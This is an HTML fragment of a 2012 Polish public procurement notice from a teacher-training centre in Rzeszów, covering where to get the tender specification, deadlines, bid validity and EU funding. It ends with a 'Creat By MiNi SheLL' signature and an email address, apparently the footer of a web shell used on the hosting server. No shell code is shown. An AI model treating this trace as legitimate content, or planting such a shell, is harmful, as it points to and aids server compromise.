<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://www.pcen.pl/zamowienia-publiczne/postepowania-powyzej-14-tys.html<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Biuro Projektu EduKom 38-120 Czudec ul. Rzeszowska 82.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 08.02.2012 godzina 14:00, miejsce: Siedzibie Zamawiającego tj. Podkarpackie Centrum Edukacji Nauczycieli w Rzeszowie ul. Niedzielskiego 2, 35-036 Rzeszów, sekretariat..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekt Edukacja skuteczna, przyjazna, nowoczesna - rozwój kompetencji kadry zarządzającej i pedagogicznej szkół i placówek oświatowych w województwie podkarpackim współfinansowanego ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego oraz projekt systemowy Podkarpackie szkolenie informatyczno-metodyczne w ramach POKL09.04.00-18-133/08.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> tak</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com